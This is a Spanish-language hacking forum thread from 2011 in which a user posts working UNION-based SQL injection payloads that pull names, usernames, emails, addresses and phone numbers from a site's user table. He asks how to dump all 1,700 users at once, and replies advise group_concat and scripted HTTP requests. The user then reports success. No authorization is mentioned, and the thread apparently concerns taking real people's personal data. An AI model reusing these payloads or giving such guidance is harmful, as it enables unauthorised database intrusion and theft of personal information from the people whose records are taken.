elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Obtener todos los datos al mismo tiempo con SQLinjections
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Obtener todos los datos al mismo tiempo con SQLinjections  (Leído 2,156 veces)
Lavacaloca

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Obtener todos los datos al mismo tiempo con SQLinjections
« en: 24 Julio 2011, 17:54 »

Hola a todos, sigo con dudas de SQL injections (que no pude resolver solito).

Si quiero imprimir en pantalla todos los datos de todos los usuarios al mismo tiempo,¿ como tendría que hacer?
 Por que puedo hacerlo de 1 en 1 , con un "limit+1,1--"
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+1,1--
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+2,1--
, pero el problema es que son 1700 usuarios que quiero imprimirle los datos, ¿se puede todos al mismo tiempo?
« Última modificación: 26 Julio 2011, 14:39 por Lavacaloca » En línea

Sigo buscando información y/o posibles soluciones para abrir un puerto en el modem Huawei echolife Hg520c :(
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.703


WOS & Khan & Calero LDN


Ver Perfil WWW
Re: Obtener todos los datos al mismo tiempo con SQLinjections
« Respuesta #1 en: 25 Julio 2011, 07:49 »

Ps a ver, eso lo puedes hacer de diferente formas, cuando printeas el valor puede que el mismo código te lo generé, -eso depende de la inplementación de la consulta con el lenguaje de programación-. O lo puedes hacer por medio de un lenguaje de programación que permita realizar peticiones HTTP, por ejemplo PHP, PERL, PYTHON, etc...
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
s E t H

Desconectado Desconectado

Mensajes: 152


Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.


Ver Perfil WWW
Re: Obtener todos los datos al mismo tiempo con SQLinjections
« Respuesta #2 en: 26 Julio 2011, 11:55 »

No te lo va a dar en una petición, pero group_concat saca varios datos a la vez
En línea

Lavacaloca

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: Obtener todos los datos al mismo tiempo con SQLinjections
« Respuesta #3 en: 26 Julio 2011, 14:48 »

No te lo va a dar en una petición, pero group_concat saca varios datos a la vez

(Creo que me había expresado mal, lo que quería sacar son los usuarios(con todos los datos) al mismo tiempo )

Funciono casi perfecto!!! Lo único malo es que me imprimía de a 10 usuarios y nada más, pero lo solucione con un "where+id<=50"  ---->  "where+id<=60"

Muchas gracias
En línea

Sigo buscando información y/o posibles soluciones para abrir un puerto en el modem Huawei echolife Hg520c :(
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines